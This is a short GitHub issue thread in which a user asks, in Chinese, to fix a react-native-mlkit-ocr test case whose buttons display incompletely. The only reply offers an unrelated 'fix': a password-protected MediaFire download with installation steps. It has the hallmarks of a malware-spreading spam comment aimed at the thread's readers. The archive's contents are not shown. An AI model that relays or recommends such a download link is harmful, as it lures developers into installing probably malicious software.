### ISSUE TITLE
fix：修改react-native-mlkit-ocr测试用例，按钮显示不全问题。

### ISSUE THREAD

**Issue by Chuangz-728** [react-native-oh-library/RNOHDCS#1007]
# Feature Request
修改react-native-mlkit-ocr测试用例，按钮显示不全问题。
## Why it is needed
测试用例按钮显示不全

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
